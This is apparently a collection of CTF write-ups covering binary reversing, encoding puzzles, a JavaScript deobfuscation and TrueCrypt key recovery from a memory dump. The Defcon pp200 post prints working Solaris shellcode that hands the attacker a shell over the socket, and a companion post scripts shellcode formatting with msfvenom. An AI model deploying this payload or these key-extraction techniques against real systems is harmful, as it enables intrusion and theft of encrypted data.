Epic Fail

January 26, 2012

Yan Alexandrovich Shoshitaishvili

Mozilla CTF 2012 - securefilelock (challenge 1) writeup

This challenge was really fun, because it required us to go back to basics. It's a 64-bit binary, so (our version of) IDA's hexrays decompiler couldn't decompile it. Additionally, to add some old-school flavor, (our version of) FLAIR choked on Debian Wheezy's 64-bit libraries, so we didn't even apply flirt sigs. The result was some fun, old-school binary reversing! It turned out not to be very difficult, but still super fun.

When running the binary, it's pretty clear that it decrypts and dumps a file, then launches vlc to play it. Here's the output of a given run:


$ echo asdf | ./securefilelock
Welcome to Secure File Lock
Playing 'Ethereal Awakening' by Project Divinity (CC BY-NC-SA 2.5)
Please enter your password. (max length = 32):
Processing.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................


And here it is with some strace goodness:

yans@lath|~/code/security/mozilla/sfl$ echo asdf | strace ./securefilelock
execve("./securefilelock", ["./securefilelock"], [/* 40 vars */]) = 0
uname({sys="Linux", node="lath", ...})  = 0
brk(0)                                  = 0x1028000
brk(0x10291a0)                          = 0x10291a0
arch_prctl(ARCH_SET_FS, 0x1028880)      = 0
brk(0x104a1a0)                          = 0x104a1a0
brk(0x104b000)                          = 0x104b000
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 5), ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f53755e8000
write(1, "Welcome to Secure File Lock\n", 28Welcome to Secure File Lock
) = 28
write(1, "Playing 'Ethereal Awakening' by "..., 67Playing 'Ethereal Awakening' by Project Divinity (CC BY-NC-SA 2.5)
) = 67
write(1, "Please enter your password. (max"..., 47Please enter your password. (max length = 32):
) = 47
fstat(0, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f53755e7000
read(0, "asdf\n", 4096)                 = 5
write(1, "Processing......................"..., 680Processing.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
) = 680
getpid()                                = 7048
open("/tmp/sf.z6GiAx", O_RDWR|O_CREAT|O_EXCL, 0600) = 3
fcntl(3, F_GETFL)                       = 0x8002 (flags O_RDWR|O_LARGEFILE)
fstat(3, {st_mode=S_IFREG|0600, st_size=0, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f53755e6000
lseek(3, 0, SEEK_CUR)                   = 0
write(3, "QT>+\t2\f\36v?k^iX\35\5I\302\f'\10cjnH~\ndhw\r+"..., 6680576) = 6680576
write(3, "H3,\27\230A\n\333l~'l#\205\4]NL,b\23\340PQ\365\354\212\205\246\333 \363"..., 1604) = 1604
close(3)                                = 0
execve("/usr/bin/vlc", ["/usr/bin/vlc", "--play-and-exit", "/tmp/sf.z6GiAx"], [/* 40 vars */]) = -1 ENOENT (No such file or directory)
exit_group(0)                           = ?

We can clearly see it writing the file and calling vlc, and by looking at IDA, we can quickly see the decryption loop at 00000000004011A7:

decryption loop
It's an xor, so all we need is the key and the challenge is solved. Finding it turned out to be another fun part. As you can see in the loop above, it loops over file_contents (the encrypted file in .data) for file_length bytes (a value in .data), which is 6682180. So we're looking for a 6682180-byte version of 'Ethereal Awakening' by Project Divinity. As luck would have it, googling for the name and the number produced a few results, one of which was some random torrent. We grabbed the encrypted file from memory, downloaded the torrent (file available here), and came up with the key "yciNhAh" by xoring the encrypted file with the original. Of course, we could have just xored the first seven encrypted bytes with the expected ID3 header (49 44 33 03 00 00 00), but what's the fun in that?
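The known-plaintext step can be sketched in a few lines of Python. This is a minimal illustration, not the script we actually used: `xor_bytes`, `smallest_period` and `recover_key` are hypothetical helper names, and the "encrypted" data is generated on the spot so the example is self-contained.

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (same operation encrypts and decrypts)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def smallest_period(stream: bytes) -> int:
    """Length of the shortest prefix that, repeated, reproduces the stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return n
    return len(stream)


def recover_key(encrypted: bytes, original: bytes) -> bytes:
    """XOR ciphertext with known plaintext, then cut the keystream to one period."""
    keystream = bytes(e ^ o for e, o in zip(encrypted, original))
    return keystream[:smallest_period(keystream)]


if __name__ == "__main__":
    # Stand-in for the real files: an ID3 header followed by filler bytes.
    header = bytes.fromhex("49443303000000")
    original = header + b"rest of the mp3 ..." * 4
    encrypted = xor_bytes(original, b"yciNhAh")

    print(recover_key(encrypted, original))        # whole-file approach
    print(recover_key(encrypted[:7], header))      # header-only shortcut
```

The header-only shortcut works here because the key is no longer than the known header bytes; with a longer key, more known plaintext would be needed.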

by Zardus (noreply@blogger.com) at January 26, 2012 12:35 PM

December 24, 2011

Luca Invernizzi

iCTF 2011: Challenges writeup

Hello people!
The International Capture The Flag hacking competition iCTF 2011, the biggest CTF so far, is over, and it's time for writeups!
Here are the solutions to the challenges I wrote. Hope you enjoyed them!



I Read It Encoded: Challenge, 50 dirty $


I read it encoded. Can you?


Attached: IReadItEncoded
The attachment is a base64-encoded QR code in ascii art. Print it with a really tiny monospace font, decode it and you'll have the solution.
Solution: Xis4n00bs
Teams that solved it: 31/89



Where Is My Cut?: Challenge, 125 dirty $

        Hey dude,
        I just found Alexey "Donkey" Dragunov passed out in the server room, stinkin' drunk.
        Damn him... He probably freaked out for tomorrow, thinking we will never make it.
        But *we* will.
        We always do.
        I still need to "do the deed" with Monaco's tranche.
        I know the site to use for it is legitimatebiz.ictf2011.info, but I have no freakkin' clue on
        what to do there.
        You're good at this stuff. Can you help me?
        The only thing I found is the sheet of paper attached. It was stuck to the servers, sucked in
        by the fans.
        As always, you will *not* fail me.


Fun challenge. Loading http://legitimatebiz.ictf2011.info, teams first found a simple Rails website about duck trading. It was a red herring :)
Later in the competition, I replaced it with the standard "It Works!" page of an Apache fresh install, to which I've added a single line "To add content, ssh into this machine".
Turns out people don't read the content of the "It Works!" page anymore (even if it's 3 lines): lots of hackers complained that the website was down, and were told to learn how to read :)

Following the ssh route, teams were faced with this message:




$ ssh donkey@legitimatebiz.ictf2011.info
Host key fingerprint is 97:c5:4a:f4:7a:c1:0c:6c:3c:78:52:73:55:ce:3a:70
+--[ECDSA  256]---+
|         == .....|
|        o.*O   o |
|         +..O E o|
|         . = + . |
|        S = . o  |
|         . .   . |
|                 |
|                 |
|                 |
+-----------------+


Verification code: 

This is the prompt of the Google Authenticator PAM module for two-factor authentication.

If you didn't know that, a big hint is given by the content of the QR code in the picture (otpauth://totp/donkey@ip-172-19-1-77?secret=JUSH3O2LQ3WSJKSC).
Using the Google Authenticator app for Android/iPhone with the QR code, and the password in the picture (GimmieMyCut), you can log in to the server.
The server's answer contains the solution.
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-virtual x86_64)
[..]
ComeOnTooEasyConnection to legitimatebiz.ictf2011.info closed.
Solution: ComeOnTooEasy
Teams that solved it: 22/89
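
For those without a phone at hand, the verification code can also be computed from the secret in the QR code. The sketch below is a minimal TOTP (RFC 6238) implementation, assuming the Google Authenticator defaults of HMAC-SHA1, a 30-second time step and 6 digits; the function name `totp` is made up for this example.

```python
import base64
import hashlib
import hmac
import struct
import time
from typing import Optional


def totp(secret_b32: str, at: Optional[float] = None,
         step: int = 30, digits: int = 6) -> str:
    """Time-based one-time password for a base32-encoded shared secret."""
    key = base64.b32decode(secret_b32.upper())
    now = time.time() if at is None else at
    counter = int(now // step)                      # number of elapsed time steps
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation (RFC 4226)
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)


if __name__ == "__main__":
    # Secret taken from the otpauth:// URL in the challenge picture.
    print(totp("JUSH3O2LQ3WSJKSC"))
```

The code only matches what the server expects if the local clock is reasonably in sync with the server's.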

Inferno: Challenge, 250 dirty $

When I was playing around with the backdoor I deployed on Zeus' laptop,
I found that he was very interested in this page.
Discover why, and if it's worth something, you'll get a good cut.
Attached: inferno.html
A lot of people told me they loved this one :).

The attachment looked like a geological conference website, featuring pieces of the worst html I've ever written.
In the middle of that mess, an odd-looking javascript comment could be spotted:
+++++++++++++++++++++++++[>++>+++>++++>+++++<<<<-]+++++++++++++++++++++++++>>>-----------.>--------------.<<<------.<+++++++.>>---------.>>----------.+++++++++.<<<.<.>>>>------.---.+++++++++++++.<++++++++++++.<<-----.>>>+.<<<<.>>>>++++++.<++++++++++.>----.<+++.<<<.>>>---------------.>.-.<<<<.>>>+++.>-----.+++.<<<<.>>>>++.<++.---.<<<.>>>-----------.>-----------.++++..--------.+++++++++++++.-----.<+++++++.>+..<<<<.>>>>----.+++++.<+.<<<.>>>>------.+++++.<<<<.>>+++++++++++++++.>>+++++++.<-.>-------.++++++.<++++++++.------.>-----.<<<+++++++.<..>>--------.<<.>>>>----.+++.+.++++++++.<<<<.>>>>--------.-.--.+++++++++++++.<<<<.>>>>.----------.++++++.<<<<----------------------.>>>.--.>-------.<<<--------------.>>+++.+.--.>+.<+.+.<<.>>>--.<.>++++++..<----.++++++.--.>.<<<.>>>.<.>-----.++++++.<<<.>>+.>--.---.--.<<<.>>>+++++++.<++.---.<<.>>--.++++++.>--.<------.>------.<++.>+++++++.<<<.>>>----.<+.<<.>>++.---.>---..<<<++++++++++++.------------.>>>+++++++.----.<<<.>>-.>.-.<<<+++++++.>>>++++++.<<<-------.>>>.--.+++++++.<<<.>>>-----.-----.<<<.>>-.>.--.+++.----.<--.>---.+++++.<<<<.>>>.++++++.------.>-----.+++++.<<<.>>>++++++.<+++++++.-------.>.<<<.>>>+++++.----------.++++++.<<<.>>>-------.<++++.>++++++++.<.>----.<<<.>>++.>---.+++++.<<<.>>>.<+.---.<<.>>>-------.++.-.<.>+++++++++++.<<<++++++++++++++.<.>>--.>++++++++++.-----------.>------.---.<+..-.<<--.<.>------------....>--.>>--.<+++++.--.>-.<------.<<<...>++++++++.>--.-.-------.-.-.>----.>+++++++++++++++++.-.<<----.>----.>---.<<---.>---.>---.<<---.>---.>---.<--.>--.<<<++.-.>>----.<+++++++++++.<+++.-.-.-.-.-.-.-.-.-.-.-.>>>++++++++++++.-.-.-.-.-.-.<<--.-.--.>>----.<<<+.>---.>>++++++++++.--------------.<<--.>>--.-.<<----.-.>>---.-------.+++++.<<----.>>--------.<<--.<<.
Yep, it's BrainFuck. Its execution printed this

Yo, Ben, here's your cut for the Zimmermann job in Quantico.  I know only you
can decode messages sent from the circles of hell, so don't try to complain
again that you never got the money.
Godspeed,
    Enigma
(CB;:9]~}5Yz2Vw/StQr*)M:,+*)('&%$#"!~}|{zyx875t"2~p0nm,+jch'`%
The message alludes to cryptography (Zimmermann, Enigma), and to hell.
What's the programming language that comes straight from the eighth circle of hell, and that encrypts its instruction pointer? A quick search on wikipedia's page of esoteric programming languages leads to Malbolge (read the description, it's quite fun).
Executing the code in the Malbolge interpreter leads to the solution.
Solution: EvIl!
Teams that solved it: 22/89
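
If you don't have a BrainFuck interpreter around for the first stage, one is quick to write. This is a minimal sketch assuming the usual conventions (8-bit wrapping cells, a 30000-cell tape, 0 on end of input); `run_brainfuck` is a name made up for this example. Fed the javascript comment above, its output should start with "Yo, ".

```python
def run_brainfuck(program: str, stdin: str = "") -> str:
    """Run a BrainFuck program and return everything it printed."""
    # Precompute the position of the matching bracket for every [ and ].
    jump, stack = {}, []
    for pos, ch in enumerate(program):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            start = stack.pop()
            jump[start], jump[pos] = pos, start

    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    inp = iter(stdin)
    while pc < len(program):
        ch = program[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == ",":
            tape[ptr] = ord(next(inp, "\0")) % 256
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]          # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]          # jump back to the loop start
        pc += 1
    return "".join(out)


if __name__ == "__main__":
    # 8 * 8 + 1 = 65, the ASCII code of "A".
    print(run_brainfuck("++++++++[>++++++++<-]>+."))
```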


Domain Hunter: Challenge, 350 dirty $

Here at iCTF HQ, we have a little ADD problem.
Seeing how cheap domains were when we registered ictf2011.info, we decided to buy another domain.
There was a bulk discount!
Cool, ha?
Except, we forgot what the domain was.
Can you find it?
SQUIRREL!
This one wasn't difficult. One of the ways it could be solved is by looking up WHOIS information for ICTF2011.INFO, and googling for a subset of those.
"Billing Name:Yan Shoshitaishvili Billing Organization: Billing Street1:2541 W. Firebrook Rd Billing Street2: Billing Street3: Billing City:Tucson Billing State/Province:Arizona " returns exactly two results:



Score! You think. Except, http://0x69637466.info/ points to a GoDaddy parking page. The solution, instead, was placed at http://www.0x69637466.info/ . Turns out, this little trick confused several people, who later contacted me on IRC to /facepalm.
Solution: I@mD@Sh3rl0k0fth31nt3rn3tz.
Teams that solved it: 39/89

by Luca Invernizzi (noreply@blogger.com) at December 24, 2011 08:18 AM

December 20, 2011

Michael Weissbacher

iCTF 2011 challenge 15 writeup (150 points)

One of my iCTF challenges was a simple JavaScript obfuscation; a backup of the code is available here. What happens is obvious: window.alert is triggered with the message “why?”. “Why” is less obvious, since the code was encoded with jjencode. There are no other visible hints.

To further look into window.alert, we can overwrite the function:

window.alert = function(e) { console.log(JSON.stringify(e)); };

After re-running the code we see that window.alert is not being called with a String as argument, but with an object which contains the attribute:

{"secret":"Angelina Jolie's only good movie, in leet speak, reverse is the key"}

The solution is obviously: Hackers

FYI: Before the obfuscation the code looked like this:

var obj = { };
obj.secret = "Angelina Jolie's only good movie, in leet speak, reverse is the key";
obj.toString = function(e) { return "why?"; };
obj.toSource = function(e) { return "function toSource() {\n" +
" [native code]\n" +
"}\n"
};
window.alert(obj);

by Michael at December 20, 2011 08:31 AM

June 10, 2011

Johannes Schlumberger

Shellcode from C

As Luca has already pointed out, we spent a lot of time developing our own shellcode for the pp200. Usually a typical shellcode development environment looks like this:
void
f(void)
{
    //__asm__ or C code
}
int
main()
{
    f();
}
The actual code goes into the f-function either as inline assembly or C. The module is then typically compiled and disassembled, and the resulting opcodes are put into an exploit script in binary form, as a C array, or whatever you prefer. Formatting the disassembled opcodes into the needed format usually costs about 1-2 minutes per iteration; no big deal, but since it is scriptable it shall be done:
#!/usr/bin/python
# Runs on both Python 2 and Python 3.
import sys
import re

def get_code():
    # Parse objdump lines ("address: hex bytes    mnemonic") into a list of ints.
    code = []
    lines = sys.stdin.readlines()
    pattern = re.compile(r'.*:\s+(([0-9a-f]{2} | [0-9a-f]{2})+)($|\s\s\s\s+.*)')
    hexpat = re.compile(r'([0-9a-f]{2})')
    for i in lines:
        i = i.rstrip('\n')
        match = re.search(pattern, i)
        if match:
            match = re.findall(hexpat, match.group(1))
            for byte in match:
                code.append(int(byte, 16))
        else:
            raise Exception('line "%s" did not match expected format' % (i))
    return code

def write_binary(code):
    # Raw bytes must go to the binary stream on Python 3.
    out = getattr(sys.stdout, 'buffer', sys.stdout)
    out.write(bytes(bytearray(code)))

def write_c_arr(code):
    sys.stdout.write('static char code [] = "')
    for byte in code:
        sys.stdout.write("\\x%02x" % byte)
    sys.stdout.write('";\n')

def write_python_string(code):
    sys.stdout.write('code = "')
    for byte in code:
        sys.stdout.write("\\x%02x" % byte)
    sys.stdout.write('"\n')

def usage(name):
    sys.stdout.write("%s \npossible modes:\n\t-b binary (default)\n\t-p python\n\t-c C\n\ninput is read from stdin\n" % name)

def main():
    if len(sys.argv) == 2 and (sys.argv[1] == '-h' or sys.argv[1] == '--help'):
        usage(sys.argv[0])
        sys.exit(0)
    code = get_code()
    if len(sys.argv) == 2:
        if sys.argv[1] == '-b':
            write_binary(code)
        elif sys.argv[1] == '-p':
            write_python_string(code)
        elif sys.argv[1] == '-c':
            write_c_arr(code)
    else:
        # No mode given: binary is the default.
        write_binary(code)

if __name__ == '__main__':
    main()

You simply pipe or paste the output of objdump -D into the script and it outputs the opcodes in raw binary form, as C-array or python-string.
Plugging in our solaris shellcode gives us:
shell_code.py -c                            
80483a6: 90 nop
80483a7: 31 d2 xor %edx,%edx
80483a9: 31 db xor %ebx,%ebx
80483ab: 31 ff xor %edi,%edi
80483ad: 31 c9 xor %ecx,%ecx
80483af: b3 09 mov $0x9,%bl
80483b1: 66 bf 3e 00 mov $0x3e,%di
80483b5: b1 05 mov $0x5,%cl
80483b7: 52 push %edx
80483b8: 53 push %ebx
80483b9: 51 push %ecx
80483ba: 52 push %edx
80483bb: 89 f8 mov %edi,%eax
80483bd: cd 91 int $0x91
80483bf: 6a 01 push $0x1
80483c1: 53 push %ebx
80483c2: 51 push %ecx
80483c3: 52 push %edx
80483c4: 89 f8 mov %edi,%eax
80483c6: cd 91 int $0x91
80483c8: 6a 02 push $0x2
80483ca: 53 push %ebx
80483cb: 51 push %ecx
80483cc: 52 push %edx
80483cd: 89 f8 mov %edi,%eax
80483cf: cd 91 int $0x91
80483d1: 31 c0 xor %eax,%eax
80483d3: 50 push %eax
80483d4: 68 6e 2f 73 68 push $0x68732f6e
80483d9: 68 2f 2f 62 69 push $0x69622f2f
80483de: 89 e3 mov %esp,%ebx
80483e0: 50 push %eax
80483e1: 53 push %ebx
80483e2: 89 e2 mov %esp,%edx
80483e4: 50 push %eax
80483e5: 52 push %edx
80483e6: 53 push %ebx
80483e7: b0 3b mov $0x3b,%al
80483e9: 50 push %eax
80483ea: cd 91 int $0x91
static char code [] = "\x90\x31\xd2\x31\xdb\x31\xff\x31\xc9\xb3\x09\x66\xbf\x3e\x00
\xb1\x05\x52\x53\x51\x52\x89\xf8\xcd\x91\x6a\x01\x53\x51\x52\x89\xf8\xcd\x91\x6a\x02
\x53\x51\x52\x89\xf8\xcd\x91\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89
\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\x50\xcd\x91";
This script can be used with metasploit's msfvenom to create shellcode that is, for example, also free of zero bytes and newlines and has a 200-byte nop-sled prepended:
shell_code.py | ./msfvenom -p - -n 200 -b '\x00\x0a' -f c

by spjsschl (noreply@blogger.com) at June 10, 2011 12:10 PM

June 06, 2011

Luca Invernizzi

Defcon Quals 19: Pwtent Pwnable 200 (pp200) writeup

Here's how the pp200 challenge was solved by the Shellphish team (by Manuel, Johannes, Don and me).
For this challenge, we were given an address/port and a file, which was a Solaris executable.
Opened in IDA, the executable turned out to be a simple forking server. For each incoming TCP connection, if the source port is in the 5000-6000 range, 73 bytes are read and then executed (except the first byte).
The child process just executed this:

int __cdecl client_callback(int fd)
{
    void *v1; // esp@1
    uint16_t v2; // ax@3
    int v4; // [sp+0h] [bp-38h]@1
    int execute_buf; // [sp+Ch] [bp-2Ch]@1
    int *v6; // [sp+10h] [bp-28h]@1
    int v7; // [sp+14h] [bp-24h]@6
    void (*execute_the_buffer)(void); // [sp+18h] [bp-20h]@1
    socklen_t len; // [sp+1Ch] [bp-1Ch]@1
    struct sockaddr addr; // [sp+20h] [bp-18h]@1

    v6 = &v4;
    v1 = alloca(16 * ((unsigned int)(BUFSIZE + 30) >> 4));
    execute_buf = 16 * ((unsigned int)((char *)&execute_buf + 3) >> 4);
    execute_the_buffer = (void (*)(void))(16 * ((unsigned int)((char *)&execute_buf + 3) >> 4) + 1);
    len = 16;
    if ( getpeername(fd, &addr, &len) == -1 )
        exit(-1);
    v2 = ntohs(*(uint16_t *)&addr.sa_data[0]);
    printf("port: %d \n\n\n", v2);
    if ( ntohs(*(uint16_t *)&addr.sa_data[0]) > 0x1387u && ntohs(*(uint16_t *)&addr.sa_data[0]) <= 0x1770u )
        exit(-1);
    v7 = readAll(fd, execute_buf, BUFSIZE);
    printf("read %d bytes\n\n\n", v7);
    execute_the_buffer();
    return 0;
}
So, we needed to send a shellcode shorter than 72 bytes. Unfortunately, Metasploit was of little help here, so we had to scout the web looking for suitable candidates. After several cases of it-works-on-our-VM-but-not-at-DDtek, we decided to roll our own.

Here it is: it spawns a shell using the TCP connection file descriptor as stdin, stdout and stderr.

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>

void f(void);
int
main(int argc, char **argv)
{
    f();
}
void f(void)
{
    __asm__(
        //padding
        "nop \n"
        //dup 0 into 5: fcntl(5, F_DUP2FD, 0) makes fd 0 a copy of socket fd 5
        "xor %edx, %edx \n"
        "xor %ebx, %ebx \n"
        "xor %edi, %edi \n"
        "xor %ecx, %ecx \n"
        "mov $9, %bl \n"       //F_DUP2FD
        "mov $62, %di \n"      //syscall number of fcntl
        "mov $5, %cl \n"       //fd of the TCP connection
        "push %edx \n"
        "push %ebx \n"
        "push %ecx \n"
        "push %edx \n"
        "mov %edi, %eax \n"
        "int $0x91 \n"
        //dup 1 into 5: same call with target fd 1
        "push $1 \n"
        "push %ebx \n"
        "push %ecx \n"
        "push %edx \n"
        "mov %edi, %eax \n"
        "int $0x91 \n"
        //dup 2 into 5: same call with target fd 2
        "push $2 \n"
        "push %ebx \n"
        "push %ecx \n"
        "push %edx \n"
        "mov %edi, %eax \n"
        "int $0x91 \n"
        // //close stdin
        // "push %edx \n"
        // "push %edx \n"
        // "incl %ecx \n"
        // "mov %ecx, %eax \n"
        // "int $0x91 \n"
        //shell: execve("//bin/sh", argv, NULL), syscall 0x3b
        "xorl %eax,%eax \n"
        "pushl %eax \n"
        "pushl $0x68732f6e \n"
        "pushl $0x69622f2f \n"
        "movl %esp,%ebx \n"
        "pushl %eax \n"
        "pushl %ebx \n"
        "movl %esp,%edx \n"
        "pushl %eax \n"
        "pushl %edx \n"
        "pushl %ebx \n"
        "movb $0x3b,%al \n"
        "pushl %eax \n"
        "int $0x91 \n"
    );
}



 Total: 69 bytes (and 1 for padding)
\x90\x31\xd2\x31\xdb\x31\xff\x31\xc9\xb3\x09\x66\xbf\x3e\x00\xb1\x05\x52\x53\x51\x52\x89\xf8\xcd\x91\x6a\x01\x53\x51\x52\x89\xf8\xcd\x91\x6a\x02\x53\x51\x52\x89\xf8\xcd\x91\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\x50\xcd\x91
That's it. For future reference, here's the mapping between the familiar Debian commands and the OpenSolaris ones that were useful in the competition.

  • apt-cache search  => pkg search
  • apt-get install => pkg install
  • strace => truss (strace didn't appear to work)


Ciao!


ps: EpicFail (which is part of the ShellPhish team) just opened a blog on hacking.

by Luca Invernizzi (noreply@blogger.com) at June 06, 2011 11:22 AM

May 18, 2011

Michael Weissbacher

PlaidCTF Writeup: Fun with Firewire

This is a writeup of the PlaidCTF 500 pts challenge “Fun with Firewire”.

###############
Description:
Category: forensics

All of the machines at the AED office are encrypted using the amazing TrueCrypt software.
When we grabbed one of their USB sticks from a computer, we also grabbed the memory using the Firewire port.

Recover the key using the truecrypt image and the memory dump.

http://www.plaidctf.com/chals/81d9467f812d2fbb32e9d4b915cccfe457245f25.tar.bz2

###############

 

Introduction

We are given a memory dump (128 MB) of a running Windows XP SP3 machine as well as a 32 MB file containing random data (a TrueCrypt volume image, according to the problem description). The memory dump was supposedly extracted via the Firewire port: The Firewire specification allows devices to have full DMA access. This allows forensic analysts (or a malicious hacker) to plug into any running computer that has a Firewire port and gain full access to the machine within seconds. Papers describing the attack and tools can be found at http://www.hermann-uwe.de/blog/physical-memory-attacks-via-firewire-dma-part-1-overview-and-mitigation. A different way to get a dump of the memory would be to conduct a “cold boot attack” as described in this paper: http://citp.princeton.edu/pub/coldboot.pdf.

Overview

To get an overview of the memory dump we inspect it with volatility. We see that TrueCrypt was running at the moment the dump was taken … good.

Further inspection of the memory dump reveals that the Operating System is Windows XP SP3, and the latest version of TrueCrypt (7.0a) is used. We reconstruct the setup by launching a VirtualBox installation, and we extract the memory using Mantech Memory Dumper mdd http://sourceforge.net/projects/mdd/. TrueCrypt offers the possibility to cache the passwords for mounting encrypted volumes. Comparing different memory dumps led us to conclude that password caching was not enabled in the TrueCrypt software.

We briefly summarize the relevant technical details of TrueCrypt. More information can be found at http://www.truecrypt.org/docs/. In order to mount an encrypted volume, TrueCrypt uses the password and/or one or more key-files in order to decrypt the header (first 512 bytes of the volume). If the header gets correctly decrypted (a magic cookie is found), TrueCrypt reads the configuration (encryption algorithm and mode, etc.) as well as the master and secondary key into memory, and safely overwrites the memory regions where the password / key-file location was stored. The extracted master and secondary keys are used for any further encryption and decryption of data. Since the data is encrypted and decrypted on the fly, these keys remain in memory. (Note that recent papers suggest storing the keys in CPU registers, more specifically in SSE registers http://portal.acm.org/citation.cfm?id=1752053 or in MSR registers http://arxiv.org/abs/1104.4843 instead of in the RAM in order to mitigate these attacks.)

The default cipher used by TrueCrypt is AES in XTS mode, which uses two 256-bit AES keys. We have to locate these keys in the memory dump. One option would be to analyze the data structures and locate the memory region where TrueCrypt stores the keys. But it is easier to use a generic approach to locate AES keys, since a tool for that task was already written for the “cold boot attack” research by Jacob Appelbaum: AESKeyFinder http://citp.princeton.edu/memory/code/.

Once we have the right keys, we replace the header of the encrypted volume with the header of an identical volume which we created and where we set the password (so that TrueCrypt starts the mounting process correctly), but have TrueCrypt patched so that it uses the extracted keys from the memory dump instead of the ones from the newly generated header.

Finding the keys

AESKeyFinder inspects memory dumps (or actually any kind of files) and performs a simple heuristic to estimate entropy. The tool targets the expanded AES keys and tests whether a contiguous region in memory satisfies the constraints of a valid AES key schedule https://secure.wikimedia.org/wikipedia/en/wiki/Rijndael_key_schedule.
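
The key schedule test can be illustrated with a short Python sketch. It is not how aeskeyfind is implemented (the real tool is written in C and tolerates bit errors); it is a strict, slow check under the assumption that the dump contains an undamaged 240-byte AES-256 key schedule. All function names are made up for this example.

```python
def _xtime(b: int) -> int:
    """Multiply by 2 in GF(2^8) modulo the AES polynomial 0x11b."""
    b <<= 1
    return (b ^ 0x11B) & 0xFF if b & 0x100 else b


def _build_sbox() -> list:
    # Log/antilog tables for the generator 3 give multiplicative inverses.
    exp, log, x = [0] * 255, [0] * 256, 1
    for i in range(255):
        exp[i], log[x] = x, i
        x ^= _xtime(x)                       # x * 3 = x * 2 + x
    sbox = []
    for a in range(256):
        inv = 0 if a == 0 else exp[(255 - log[a]) % 255]
        s = inv
        for shift in range(1, 5):            # affine transform of the inverse
            s ^= ((inv << shift) | (inv >> (8 - shift))) & 0xFF
        sbox.append(s ^ 0x63)
    return sbox


SBOX = _build_sbox()


def expand_key_256(key: bytes) -> bytes:
    """Expand a 32-byte AES-256 key into its 240-byte key schedule."""
    if len(key) != 32:
        raise ValueError("AES-256 keys are 32 bytes long")
    words = [list(key[i:i + 4]) for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        temp = list(words[i - 1])
        if i % 8 == 0:                       # RotWord, SubWord, round constant
            temp = [SBOX[b] for b in temp[1:] + temp[:1]]
            temp[0] ^= rcon
            rcon = _xtime(rcon)
        elif i % 8 == 4:                     # extra SubWord for 256-bit keys
            temp = [SBOX[b] for b in temp]
        words.append([a ^ b for a, b in zip(words[i - 8], temp)])
    return bytes(b for word in words for b in word)


def is_aes256_schedule(window: bytes) -> bool:
    """True if the first 240 bytes are a valid AES-256 key schedule."""
    return len(window) >= 240 and expand_key_256(window[:32]) == window[:240]


def find_keys(dump: bytes):
    """Yield (offset, key) for every offset holding a valid key schedule."""
    for off in range(len(dump) - 239):
        if is_aes256_schedule(dump[off:off + 240]):
            yield off, dump[off:off + 32]


if __name__ == "__main__":
    key = bytes(range(32))                   # same bytes as the third key found below
    dump = b"\xaa" * 100 + expand_key_256(key) + b"\x55" * 100
    for off, found in find_keys(dump):
        print(hex(off), found.hex())
```

Scanning a 128 MB dump byte by byte this way would be very slow in pure Python, so this is only meant to show what "satisfies the constraints of a valid key schedule" means.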

So we run the tool in verbose mode:

##########################

./aeskeyfind physmem.bin -qv
FOUND POSSIBLE 256-BIT KEY AT BYTE 1166008

KEY: f0cbf260e0ca8ec2431089fb393a1c29513aaaa5847d13e8be84760968e64dc6

EXTENDED KEY:
f0cbf260e0ca8ec2431089fb393a1c29
513aaaa5847d13e8be84760968e64dc6
7f2846259fe2c8e7dcf2411ce5c85d35
88d2e6330caff5dbb22b83d2dacdce14
c0a3bc725f41749583b33589667b68bc
bbf3a356b75c568d0577d55fdfba1b4b
300c0fec6f4d7b79ecfe4ef08a85264c
c564547f723802f2774fd7ada8f5cce6
de47812eb10afa575df4b4a7d77192eb
cbc71b96b9ff1964ceb0cec96645022f
a030941d113a6e4a4ccedaed9bbf4806
dfcf49f96630509da8809e54cec59c7b
26eeb59637d4dbdc7b1a0131e0a54937
3ec9726358f922fef079bcaa3ebc20d1
03598b24348d50f84f9751c9af3218fe

CONSTRAINTS ON ROWS:
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000
a4ba4e5eec12a4d672ca77143c4062874ae580efb9fe97bde3b3e6a81897e19b
1c2d49fc319ab86e317a676a77adecd005c26ac2f92330f4bf57e7fd25517be4
